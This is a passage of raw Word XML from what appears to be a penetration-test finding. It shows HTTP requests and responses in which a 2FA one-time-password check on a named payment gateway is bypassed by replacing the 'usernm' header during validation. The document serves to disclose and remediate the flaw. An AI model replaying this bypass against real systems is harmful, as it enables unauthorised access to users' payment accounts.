                    <w:t>=</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>anRyY</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="097EBAAD" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5DCC2E33" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Pragma: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7D1552EF" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="361B970E" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5B7ED438" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "channel": </w:t>
                  </w:r>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>"text"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2BA043E8" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="1BE9BA44" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00F64CC0" w:rsidRDefault="004B23AC" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64CC0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Response 1: </w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="0067330D" w:rsidRPr="0067330D" w14:paraId="5B829224" w14:textId="77777777" w:rsidTr="00F64CC0">
              <w:trPr>
                <w:trHeight w:val="1487"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="709B732E" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="169E998F" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Thu, 30 May 2019 18:13:41 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5D75C183" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="098DB222" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Content-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>-US</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1BF77947" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FF451BC" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 71</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5AF09B4C" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{"secureAuthResponse":{"adhocOTPAudit":{"</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>status":"valid</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>"},"count":"4"}}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="3B2D5F9F" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="00F64CC0" w:rsidRDefault="004B23AC" w:rsidP="004B23AC">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64CC0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HTTP Request 2:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56BA29DB" w14:textId="77777777" w:rsidR="0067330D" w:rsidRDefault="0067330D" w:rsidP="004B23AC">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The attacker must also replace the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>usernm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> value during the validation process in order to successfully bypass 2FA.</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="0067330D" w:rsidRPr="0067330D" w14:paraId="5488FD51" w14:textId="77777777" w:rsidTr="00F64CC0">
              <w:trPr>
                <w:trHeight w:val="2129"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="3EE4A142" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>otp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/validate</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="640B2DA0" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1BE24C5D" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="53983B37" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>usernm</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve">: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>WNpbmc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>=</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>anRyY</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="12248600" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E355963" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Cache-Control: no-cache</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FB2E4F5" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>{</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D067B7A" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">  "</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>otp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>": "953502"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4CBB9D29" w14:textId="77777777" w:rsidR="0067330D" w:rsidRPr="0067330D" w:rsidRDefault="0067330D" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>}</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
